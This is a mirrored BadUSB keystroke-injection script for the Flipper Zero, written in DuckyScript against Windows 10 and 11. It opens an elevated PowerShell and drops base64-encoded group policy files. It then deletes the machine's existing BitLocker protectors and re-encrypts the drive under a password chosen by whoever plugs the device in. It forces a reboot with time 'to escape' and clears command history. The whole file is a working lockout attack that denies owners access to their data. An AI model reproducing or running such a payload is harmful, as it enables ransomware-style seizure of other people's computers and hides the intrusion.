mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-23 06:50:12 +00:00
162 lines
6.4 KiB
Plaintext
162 lines
6.4 KiB
Plaintext
|
REM Enable Bitlocker encryption with a user-supplied password
|
||
|
REM and optionally reboot the computer immediately
|
||
|
|
||
|
REM Author: emptythevoid
|
||
|
|
||
|
REM Target: Windows 10, 11
|
||
|
|
||
|
REM MORE RESEARCH REQUIRED
|
||
|
|
||
|
REM ==INFO========================================================================================
|
||
|
REM If the drive is already encrypted with a protector (lke TPM)
|
||
|
REM it will delete all protectors and substitute our own new password
|
||
|
REM without needing to re-encrypt.
|
||
|
REM If the drive doesn't have bitlocker enabled, it will do so with the new password
|
||
|
REM and take effect on next reboot (which you can optionally enable at the end)
|
||
|
|
||
|
REM Note #1: This will likely fail if the drive is currently in the process of encryption.
|
||
|
|
||
|
REM Note #2 If the target computer is a tablet (aka "slab"), Windows will disallow
|
||
|
REM preboot authentication options that might require a keyboard. To override this,
|
||
|
REM you have to set a local group policy. This might be possible to do by editing the
|
||
|
REM registry directly, but since Windows specifically complains about Group Policy,
|
||
|
REM I've encoded a Registry.pol below that you can optionally deploy.
|
||
|
REM It will create a file in C:\Windows\System32\GroupPolicy\Machine
|
||
|
REM which should take effect immediately.
|
||
|
REM This Registry.pol enables these two policy values:
|
||
|
REM Computer Configuration\Administrative Templates\Windows Components\Bitlocker Drive Encryption\Operating System Drives\ Enable use of Bitlocker authentication requiring preboot keyboard input on slates
|
||
|
REM Computer Configuration > Administrative Templates > Windows Components > Bitlocker Drive Encryption > Operating System Drives > Open the key Require additional authentication at startup
|
||
|
REM ==Launch command prompt as Admin using GUI + X ===============================================
|
||
|
REM ==NOTE that this brings up a Powershell window, not cmd.exe===================================
|
||
|
REM ==This method may be more reliable since GUI r can sometimes lose focus on open===============
|
||
|
GUI x
|
||
|
DELAY 200
|
||
|
STRING A
|
||
|
DELAY 1000
|
||
|
ALT y
|
||
|
DELAY 3000
|
||
|
|
||
|
|
||
|
REM ==Optional - local group policy to allow password protection on tablets========================
|
||
|
REM ==Simply copying the registry.pol file is not sufficient.
|
||
|
|
||
|
|
||
|
REM STRING $folderpath = [Environment]::GetFolderPath("C:\Windows\System32\GroupPolicy\Machine");
|
||
|
REM STRING $filename = $folderpath+"\Registry.pol";
|
||
|
|
||
|
STRING mkdir C:\windows\system32\grouppolicy\machine
|
||
|
DELAY 100
|
||
|
ENTER
|
||
|
DELAY 100
|
||
|
|
||
|
STRING $filename = "C:\Windows\System32\GroupPolicy\Machine\Registry.pol";
|
||
|
|
||
|
STRING $b64="UFJlZwEAAABbAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwA
|
||
|
STRING RgBWAEUAAAA7AE8AUwBFAG4AYQBiAGwAZQBQAHIAZQBiAG8AbwB0AEkAbgBwAHUAdABQAHIAbwB0AGUAYwB0AG8AcgBzAE8AbgB
|
||
|
STRING TAGwAYQB0AGUAcwAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAY
|
||
|
STRING wByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBBAGQAdgBhAG4AYwBlAGQAUwB0AGEAcgB0AHUAcAAAADsABAAAADsABAAAADsAAQAAA
|
||
|
STRING F0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBFAG4AYQBiAGwAZQ
|
||
|
STRING BCAEQARQBXAGkAdABoAE4AbwBUAFAATQAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAG
|
||
|
STRING kAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8
|
||
|
STRING AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0
|
||
|
STRING AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEYAVgBFAAAAOwBVAHMAZQBUAFAATQBLAGU
|
||
|
STRING AeQAAADsABAAAADsABAAAADsAAgAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEY
|
||
|
STRING AVgBFAAAAOwBVAHMAZQBUAFAATQBLAGUAeQBQAEkATgAAADsABAAAADsABAAAADsAAgAAAF0A";
|
||
|
|
||
|
STRING $bytes = [Convert]::FromBase64String($b64);
|
||
|
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||
|
|
||
|
DELAY 300
|
||
|
|
||
|
REM Create the GPT file. This is definitely required, but I don't know if it changes per machine
|
||
|
STRING $filename = "C:\Windows\System32\GroupPolicy\gpt.ini";
|
||
|
|
||
|
STRING $b64="W0dlbmVyYWxdDQpnUENNYWNoaW5lRXh0ZW5zaW9uTmFtZXM9W3szNTM3OEVBQy02ODNGLTExRDItQTg5
|
||
|
STRING QS0wMEMwNEZCQkNGQTJ9e0QwMkIxRjcyLTM0MDctNDhBRS1CQTg4LUU4MjEzQzY3NjFGMX1dIA0KVmVyc2lvbj01DQo=";
|
||
|
|
||
|
STRING $bytes = [Convert]::FromBase64String($b64);
|
||
|
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||
|
|
||
|
DELAY 300
|
||
|
|
||
|
REM have to gpupdate. This will take an undetermined amount of time
|
||
|
REM you may need to set this to trigger on a button press rather than a delay
|
||
|
STRING gpupdate /force
|
||
|
ENTER
|
||
|
|
||
|
|
||
|
DELAY 10000
|
||
|
|
||
|
REM ==Remove existing keys, in case bitlocker is already enabled==================================
|
||
|
STRING manage-bde -protectors -delete C:
|
||
|
ENTER
|
||
|
DELAY 1000
|
||
|
|
||
|
REM ==Clear out from messages, in case no protectors, just in case================================
|
||
|
ENTER
|
||
|
|
||
|
DELAY 2000
|
||
|
|
||
|
REM ==Enable bitlocker on C: with password and skip hardware test=================================
|
||
|
STRING manage-bde -on C: -skiphardwaretest
|
||
|
ENTER
|
||
|
DELAY 500
|
||
|
|
||
|
REM ==remove default TPM. We don't want this enabled.=============================================
|
||
|
STRING manage-bde -protectors -delete C:
|
||
|
ENTER
|
||
|
DELAY 1000
|
||
|
|
||
|
REM ==Manually add password as a protector. SET YOUR PASSWORD HERE!!==============================
|
||
|
REM ==MUST BE AT LEAST 8 CHARACTERS LONG OR ELSE IT WILL FAIL=====================================
|
||
|
|
||
|
DELAY 1000
|
||
|
STRING manage-bde -protectors -add C: -password
|
||
|
ENTER
|
||
|
DELAY 1000
|
||
|
STRING yourpasswordhere
|
||
|
ENTER
|
||
|
DELAY 1000
|
||
|
STRING yourpasswordhere
|
||
|
ENTER
|
||
|
DELAY 3000
|
||
|
|
||
|
REM ==Force the protection to be enabled so that it engages at next reboot========================
|
||
|
STRING manage-bde -Protectors -Enable C:
|
||
|
ENTER
|
||
|
DELAY 2000
|
||
|
|
||
|
REM ==Optional - Reboot after a delay. Give you time to escape====================================
|
||
|
STRING shutdown /r /t 30
|
||
|
ENTER
|
||
|
DELAY 2000
|
||
|
ENTER
|
||
|
DELAY 500
|
||
|
|
||
|
REM ==Clear history of Windows Terminal====================================
|
||
|
ALT F7
|
||
|
DELAY 200
|
||
|
|
||
|
REM ==Enable this if you are doing a delayed reboot using traditional command prompt========================
|
||
|
REM ALT F4
|
||
|
|
||
|
REM ==Enable this if you are doing a delayed reboot using GUI x prompt======================================
|
||
|
STRING exit
|
||
|
ENTER
|
||
|
|
||
|
REM ==Optional - Clear run history - not needed if using GUI +X ===================================
|
||
|
REM GUI r
|
||
|
REM DELAY 500
|
||
|
REM STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
||
|
REM ENTER
|
||
|
REM DELAY 300
|
||
|
|
||
|
REM ==Optional - reboot immediately to lock the computer==========================================
|
||
|
REM STRING shutdown /r /t 0
|
||
|
REM ENTER
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|